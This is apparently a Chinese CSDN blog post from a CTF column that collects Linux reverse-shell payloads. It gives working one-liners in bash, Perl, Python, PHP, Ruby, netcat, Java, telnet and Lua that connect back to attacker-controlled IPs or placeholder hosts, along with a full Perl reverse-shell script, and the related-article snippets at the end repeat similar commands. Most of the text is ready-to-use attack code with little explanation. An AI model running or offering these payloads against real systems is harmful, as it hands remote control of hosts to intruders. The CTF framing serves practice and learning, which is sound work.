linux下反弹shell

最新推荐文章于 2024-06-01 11:15:00 发布
最新推荐文章于 2024-06-01 11:15:00 发布
阅读量1.9k 收藏 6
点赞数 3
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaorouji/article/details/82844691
版权

最近做了几题都是反弹shell,总结一哈

bash

bash -i >& /dev/tcp/vps_ip/端口号 0>&1

bash -i 生成一个交互式的子进程

&表示在Linux后台运行

/dev/tcp/vps_ip/端口号 其实是与主机建立tcp连接

/dev/[tcp|upd]/host/port是Linux里面比较特殊的文件,读取和写入相当于建立一个socket调用

0是标准输入,1是标准输出,2是错误输出,0>&1表示将标准输入重定向到标准输出,0>1表示将标准输入重定向到文件名为1的文件,&是用来区分的标识符(Linux默认不会把错误信息重定向到文件的

举个栗子, command >file 2>&1表示将标准输出重定向到file,然后错误输出重定向到标准输出,也就是又定向到了file,所以最后,标准输出和错误输出都定向到了file

好了,解释了一波,来个实例

靶机bash命令连到主机上

监听一下

好了,shell拿到了

bash还有其他命令

/bin/bash -i >& /dev/tcp/vps_ip/端口号 0>&1

类似还有sh,同样也是监听弹shell

/bin/sh -i >& /dev/tcp/vps_ip/端口号 0>&1

exec

0x01

主机监听,靶机命令执行

exec 5<> /dev/tcp/vps_ip/端口号

cat <&5 | while read line; do $line 2>&5 >&5; done

成功getshell

0x02

本地监听,靶机执行

exec 2>&0

0>&196;exec 196<>/dev/tcp/vps_ip/端口号;sh <&196 >&196 2>&196

这个其实也是sh连接过去,但是不知道为什么,靶机会报个错,但是还是能成功弹shell

Perl

0x01

perl还是很强大的,调用sh也能成功弹到shell

继续本地监听,靶机执行

perl -e 'use Socket;$i="10.173.196.52";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
然后就能getshell了

0x02

也可以不用调用sh

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.173.80.40:2333");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

0x03

还能直接运行脚本

#!/usr/bin/perl -w
#
use strict;
use Socket;
use IO::Handle;

if($#ARGV+1!=2){
	print "$#ARGV $0 Remote_IP Remote_Port \n";
	exit 1;
}

my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];

my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port,inet_aton($remote_ip));

my $shell = '/bin/bash -i';

socket(SOCK,AF_INET,SOCK_STREAM,$proto);

STDOUT->autoflush(1);
SOCK->autoflush(1);

connect(SOCK,$pack_addr) or die "can not connect:$!";

open STDIN,"<&SOCK";
open STDOUT,">&SOCK";
open STDERR,">&SOCK";

print "enjoy the shell.\n";
system($shell);
close SOCK;
exit 0;

运行的时候加个ip和端口号,然后就能弹shell了,其实也是在利用bash去getshell

Python

0x01

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.173.200.224",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

0x02

python -c "exec(\"import socket,subprocess;s = socket.socket();s.connect(('10.173.200.224',2222))\nwhile 1: proc = subprocess.Popen(s.recv(1024),shell = True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())\")"

Php

php -r '$sock=fsockopen("192.168.1.104",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

0x01

ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

0x02

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NetCat

0x01

nc -e /bin/sh ip port

0x02

mknod backpipe p && nc 192.168.1.104 2222 0<backpipe | /bin/bash 1>backpipe

0x03

rm /tmp/p;mkfifo /tmp/p;cat /tmp/p|/bin/sh -i 2>&1|nc 192.168.1.104 2222 >/tmp/p

新建个tmp文件去存,然后回显过来

0x04

nc ip port |/bin/sh | nc ip port

监听两个通道,一个输入一个输出

Java

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])

p.waitFor()

可以看到还是调用了bash的,肉鸡不知道怎么运行(逃

Telnet

mknod backpipe p && telnet ip port 0<backpipe | /bin/bash 1>backpipe

Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('ip','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"

 

 

Xi4or0uji
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
#!/bin/bash
折翼飞翔
05-16 4万+
shell脚本的第一行中,必须写#!/bin/bash吗?带着这个问题,我今天在百度上搜索了一下, 发现在一个贴子中讨论了这个问题,觉得各个跟贴者在回答这个问题时,都解释的很有道理,现摘记如下,以便学习。 ---------------------------------------------------------------------------------------------
Linux反弹shell方式总结
qq_43936524的博客
12-11 1004
文章目录bash反弹基础知识指令分析 bash反弹 反弹指令: bash -i >& /dev/tcp/ip/port 0>&1 反弹步骤: 在kail上开启7777侦听: nc -lvp 7777 在靶机上输入反弹指令即可反弹成功 基础知识 linux下有三个标准的文件描述符: 0 - stdin 代表标准输入,使用<或<< 1 - stdout 代表标准输出,使用>或>> 2 - stderr 代表标准错误输出,使用2>或2>
.sh文件中第一行 #!/bin/bash -il 是什么
~
05-10 1907
非登录 shell 是指在已经登录的 shell 环境中再次打开一个 shell 环境,这个 shell 进程就是非登录 shell,它不会读取。非交互式则是指在 shell 环境中执行一条或多条命令,不需要用户输入。登录 shell 是指当你第一次登录系统时,系统会为你分配一个 shell 进程,这个 shell 进程就是登录 shell,它会读取。实际上是一个 shell 内置的变量,它表示当前用户的 home 目录,可以通过。在 Bash 中,有两种运行方式:登录 shell 和非登录 shell
【安全知识】——LInuxshell反弹姿势合集(更新中)
最新发布
A_991128a的博客
06-01 779
*作者名:白昼安全主页面链接:座右铭: 不要让时代的悲哀成为你的悲哀专研方向: web安全,后渗透技术每日鸡汤: **当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。下面给大家列举一些平时用的比较多的这里的演示环境为。
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5810
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
shell脚本中#!/bin/bash
u013920085的专栏
11-23 6482
shell脚本需要指定使用什么解释器来解释这个脚本,shell脚本中#!/bin/bash表示当前脚本由/bin/bash这个程序来执行 Linux中的shell有多种类型,其中最常用的几种是Bourne   shellsh)、bash、C   shell(csh)和Korn   shell(ksh) (1)Bourne Shell(即sh)是UNIX最初使用的shell,平且在每种UNIX
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux下使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
linux反弹shell的原理详解
01-08
反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
【不一样的视角剖析Linux 反弹shell】这篇文档深入探讨了Linux环境下反弹shell的详细知识,作者从独特的角度出发,挑战了传统的分类方法,为读者提供了更细致的理解。反弹shell是渗透测试中的关键技术,它涉及被控端...
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
shell脚本基础
oyyy3的博客
10-19 3955
目录 一.shell脚本概述 1.shell的作用 2.linux中常见的shell 3.shell编程规范 1.shell脚本的构成 2.脚本执行逻辑 3.shell脚本的执行方式 4.shell脚本错误 5. shell脚本用本地源创建yum仓库 4.重定向与管道 1.交互式硬件设备 2.重定向操作 3.重定向修改用户密码 二.shell脚本变量 1.常见变量基础 1.命名要求 2.自定义变量 1.定义新变量 2.赋值使用引号及其每种引号的作用 3.从键盘输入内容
Linux反弹shell命令语句解析
Lee_Natuo的博客
12-07 864
Linux反弹shell命令语句 语句格式 bash -i &amp;amp;gt;&amp;amp;amp; /dev/tcp/[ip]/[port] 0&amp;amp;gt;&amp;amp;amp;1 bash -i 打开bash &amp;amp;amp;后面跟 /dev/tcp/[ip]/[port] (相当于&amp;amp;gt;&amp;amp;amp;后面接文件)将bash的标准输出和标准错误输出传递到远
Linux反弹 shell 命令解析
守拙的博客
08-29 582
Linux 反弹 shell 命令 bash -i > /dev/tcp/192.168.139.149/4444 0>&1 各部分代表的意思。
linux bash基础命令
i_deram
03-30 2245
基础bash命令
linux教程:sh / bash命令选项(如:sh -c/-i/-n/-x)
学亮编程手记
09-18 1352
shell命令解释器。
Linux脚本:Bash脚本看这一篇就够了
热门推荐
weixin_43431593的博客
10-27 1万+
Linux脚本有很多解析器(Shell),不同解析器要求的脚本语法是不一样的。系统在解析脚本时,如果没有在脚本声明指定解析器,则会采用系统默认解析器来对脚本进行解析。sh是非常重要解析器,历史很悠久,地位很牢固。特别地,Bash是用途最广的Shell,而且是兼容sh的解析器,因此本文着重Bash Shell的研究。
Bash快速入门指南
Michael Wing's workspace
12-03 604
C语言入门模式的秘密---责任链模式Grunt-beginner前端自动化工具Android面试常客Handler详解   本文由 伯乐在线 - 巽离 翻译, 进林 校稿。未经许可,禁止转载!  英文出处: panix。欢迎加入 翻译小组。 简单shell脚本 !/bin/bash 这一行表明,不管用户选择的是那种交互式shell,该脚本需要使用bash shell来运行。由于
shell while 结束循环_Linux技巧:使用bash read命令实现一个简易shell(完整版)
weixin_39527768的博客
10-21 1231
Linux 上面,可以使用 bash 的 read 内置命令来读取用户输入。当在 while 循环中不断调用 read 命令,并打印一些提示字符,如 $、#、> 等,就可以不断接收用户输入,并执行一些自定义的命令,类似一个简易的 shell。下面主要是介绍 read 命令的常见用法,用来逐步实现一个简易的 shell 效果。read 命令介绍在 bash 中,read 内置命令可以读取用...
linux反弹shell
09-03
Linux反弹Shell是一种通过建立网络连接,将受攻击计算机的Shell会话连接到攻击者的计算机上的技术。这种技术通常用于渗透测试或者恶意攻击。 在Linux上,可以使用多种方法来实现反弹Shell。以下是其中一种常见的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值